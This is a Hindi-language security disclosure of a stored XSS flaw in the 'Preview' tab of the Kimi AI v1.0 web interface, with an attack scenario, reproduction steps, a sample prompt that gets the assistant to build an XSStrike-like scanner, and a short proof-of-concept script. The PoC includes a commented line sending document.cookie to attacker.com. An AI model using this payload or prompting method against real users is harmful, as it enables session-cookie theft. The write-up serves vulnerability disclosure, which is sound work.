
किमी AI v1.0 के प्रीव्यू टैब में संग्रहीत XSS भेद्यता का विस्तृत खुलासा, जिसमें हमले का परिदृश्य, PoC, और सुरक्षा शोधकर्ताओं के लिए उपचार मार्गदर्शन शामिल है।
Kimi AI v1.0 वेब इंटरफ़ेस की 'Preview' सुविधा में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। एप्लिकेशन AI मॉडल द्वारा उत्पन्न HTML/JavaScript पेलोड को ठीक से सैनिटाइज़ या एन्कोड करने में विफल रहता है। जब उपयोगकर्ता AI-जनित कोड देखने के लिए 'Preview' टैब पर स्विच करता है, तो दुर्भावनापूर्ण पेलोड सीधे DOM में रेंडर हो जाता है, जिससे पीड़ित के ब्राउज़र सत्र में मनमाना JavaScript निष्पादन होता है।
मुस्तफा हमीद
इस भेद्यता का शोषण AI से एक सुरक्षा उपकरण या स्क्रिप्ट (जैसे, XSStrike के समान एक स्वचालित XSS स्कैनर) बनाने के लिए प्रॉम्प्ट देकर किया जा सकता है, जिसमें अंतर्निहित पेलोड हों। AI अनुरोधित एप्लिकेशन सोर्स कोड उत्पन्न करता है लेकिन दुर्भावनापूर्ण पेलोड को HTML/JavaScript फ्रेमवर्क के भीतर एम्बेड कर देता है। जब पीड़ित जनित टूल को परीक्षण या देखने के लिए 'Preview' टैब पर जाता है, तो एम्बेडेड दुर्भावनापूर्ण पेलोड सैनिटाइज़ेशन को बायपास करके तुरंत निष्पादित हो जाता है।
"XSStrike के समान एक सरल वेब-आधारित XSS स्कैनर टूल बनाएं। स्कैनिंग के लिए पेलोड की सूची वाला एक इंटरफ़ेस शामिल करें।"
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Kimi AI वेब प्लेटफ़ॉर्म में लॉग इन करें।
2.स्कैनर कोड वाला टूल (जैसे XSStrike क्लोन) बनाने का अनुरोध करने वाला प्रॉम्प्ट प्रदान करें।
3.AI मॉडल द्वारा कोड प्रतिक्रिया पूरी तरह उत्पन्न करने की प्रतीक्षा करें।
4.रेंडर किए गए एप्लिकेशन को देखने के लिए चैट इंटरफ़ेस में 'Preview' टैब पर क्लिक करें।
5.एप्लिकेशन प्रीव्यू कंटेनर के भीतर JavaScript संदर्भ को फ़िल्टर करने में विफल रहता है, जिससे पीड़ित के ब्राउज़र में स्क्रिप्ट का तत्काल निष्पादन होता है।
नीचे स्क्रीनशॉट है जो XSS पेलोड के सफल निष्पादन को प्रदर्शित करता है। दुर्भावनापूर्ण JavaScript 'Preview' टैब पर नेविगेट करते ही तुरंत ट्रिगर हो जाता है:
